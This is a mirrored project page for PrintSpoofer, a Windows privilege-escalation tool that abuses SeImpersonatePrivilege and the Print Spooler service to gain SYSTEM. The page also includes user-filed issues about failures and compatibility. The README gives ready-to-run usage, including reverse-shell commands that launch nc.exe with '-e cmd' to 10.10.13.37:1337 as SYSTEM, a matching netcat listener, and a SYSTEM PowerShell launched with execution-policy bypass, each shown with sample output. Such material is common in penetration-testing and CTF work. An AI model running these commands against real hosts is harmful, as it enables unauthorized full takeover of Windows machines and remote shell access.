Giter Club home page Giter Club logo

printspoofer's Introduction

PrintSpoofer

From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

For more information: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/.

Usage

You can check the help message using the -h option.

C:\TOOLS>PrintSpoofer.exe -h

PrintSpoofer v0.1 (by @itm4n)

  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          That's me :)

Examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

Usage 1: Spawn a SYSTEM process and interact with it

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

C:\TOOLS>PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Usage 2: Spawn a SYSTEM process and exit

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

Create a reverse shell:

C:\TOOLS>PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Netcat listener:

C:\TOOLS>nc.exe -l -p 1337
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Usage 3: Spawn a SYSTEM process on a desktop

If you are logged on locally or via RDP (including VDI), you can spawn a SYSTEM command prompt on your desktop. First, check your session ID with the command qwinsta and then specify this value with the option -d.

Use case: Terminal Session (RDP), VDI

C:\TOOLS>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           Administrator             1  Active
>rdp-tcp#3         lab-user                  3  Active
 rdp-tcp                                 65536  Listen

C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

printspoofer's People

Contributors

itm4n avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

askyeye s1ckb0y1337 fdlucifer bravery9 zhouzu picarodd humble-desser devbabygo manantsoar keystroke-v2 keystroke95 natesubra dannymas hayasec mmg1 fengjixuchui bb33bb mushr00m whulls clavoillotte leftp scanfsec xbl3 raystyle whojeff sry309 private14 daybr4ak xianyunyehe test1213145 lovemygit yzddmr6 htchina fuck123fuckabc iiiusky protonarm-oss moon3r mrfnfn s1xhcl demossl shuxiaa explife0011 cbwang505 bloodandwolf lily110 ewestreptile pyking msf-ntdll whoamisysteminfo difa12321 joker2333 slooppe h1d3r malayke q4n l1ngfeng paladin1412 last0monster hackdou shad0w008 ddosi higit2020 x-n3t al1ex dskho startagain2016 rocker9527 hihihimimimi jasonlou realmadaha j4543519 02bx 5l1v3r1 ykankaya expendable1234 adminstrat gavz freeide jaky5155 readercrap s1lkys vyuezhengling minilulatsch hpxpat preventions dcmjid bigbrobro t-wiseau kthemis ippsec lex1010 fengzihk samuelriesz polling-repo-continua b4b857f6ee asdlei99 0xjamesli onepiz kungia09 underwood12

printspoofer's Issues

printspoofer dll

when compile it as dll and load it from other program,it won't work. the rpcopenprinter call will throw exception,no idea why,but the executable works like charm on the same environment.

No output returned from program on windows server 2019

I compiled the source using visual studio 2019 with the Release configuration. When I start the program on the machine I compiled it, I get the expected output:

PS C:\Users\root\Desktop\av_excluded> Get-FileHash .\PrintSpoofer.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          F0698E35BB277C471E1DAFDBE6777AFA504CDCB313E0774E4E854C4A556087C6       C:\Users\root\Desktop\av_excl...

PS C:\Users\root\Desktop\av_excluded> .\PrintSpoofer.exe
[-] Please specify a command to execute
PS C:\Users\root\Desktop\av_excluded>

However, when I move the binary to a windows server 2019 and execute it, I get no output:

PS C:\> Get-FileHash .\PrintSpoofer.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          F0698E35BB277C471E1DAFDBE6777AFA504CDCB313E0774E4E854C4A556087C6       C:\PrintSpoofer.exe


PS C:\> .\PrintSpoofer.exe
PS C:\>

This might be useful

PS C:\> systeminfo

Host Name:                 SRV1
OS Name:                   Microsoft Windows Server 2019 Datacenter Evaluation
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          NA
Registered Organization:   vm.net
Product ID:                00430-00000-00000-AA992
Original Install Date:     10/13/2020, 3:57:22 PM
System Boot Time:          10/15/2020, 11:34:03 AM
System Manufacturer:       Microsoft Corporation
System Model:              Virtual Machine
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2527 Mhz
BIOS Version:              Microsoft Corporation Hyper-V UEFI Release v4.0, 1/30/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague
Total Physical Memory:     2,047 MB
Available Physical Memory: 692 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 1,789 MB
Virtual Memory: In Use:    1,410 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    testdomain.local
Logon Server:              \\DC1
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4514366
                           [02]: KB4512577
                           [03]: KB4512578
Network Card(s):           1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.1.69
                                 [02]: fe80::e1a2:6227:336f:5443
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

File is not compatible

Last privilege escalation for this room use command: PrintSpoofer.exe -i -c cmd
Error: c:inetpubwwwroot for this version
t4wrksvPrintSpoofer.exe is not compatible with the version of Windows you are running. Check your computer's system information, and then contact the software publisher.
help me

Some test results

Hey! Just my 2cents based on testing:

C:\Users\<><><>\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

C:\Users\<><><>\Desktop>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

Systeminfo:

OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A Build 18363

SOLVED: Not compatible with Microsoft Windows Server 2012 R2 Standard

SOLVED: Issue solved as error was caused due to discrepancies in ftp mode between ASCII and Binary

I've tried hacking a box running Windows Server 2012 R2 when it ran this error below. I've tried both versions just to be on the safe side

========================================================================-

`c:\inetpub\wwwroot>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
This version of c:\inetpub\wwwroot\PrintSpoofer64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

c:\inetpub\wwwroot>PrintSpoofer32.exe -i -c cmd
PrintSpoofer32.exe -i -c cmd
This version of c:\inetpub\wwwroot\PrintSpoofer32.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.`

==============================================================================

systeminfo for the target OS goes as follows:

OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User

System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC

Total Physical Memory: 4,095 MB
Available Physical Memory: 790 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 1,356 MB
Virtual Memory: In Use: 3,443 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP

Why use `CreateProcessAsUser` instead of `CreateProcessWithToken`?

Hi Clément, I have an issue after reading codes

PrintSpoofer/PrintSpoofer/PrintSpoofer.cpp

Line 510 in 975a93c

if (!CreateProcessAsUser(hSystemTokenDup, NULL, g_pwszCommandLine, NULL, NULL, g_bInteractWithConsole, dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi))

Why not using CreateProcessWithToken? In my tesing, the LocalSystem uses hostname$ to login in a DOMAIN environment, and hostname$ account doesn't have SeAssignPrimaryTokenPrivilege

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.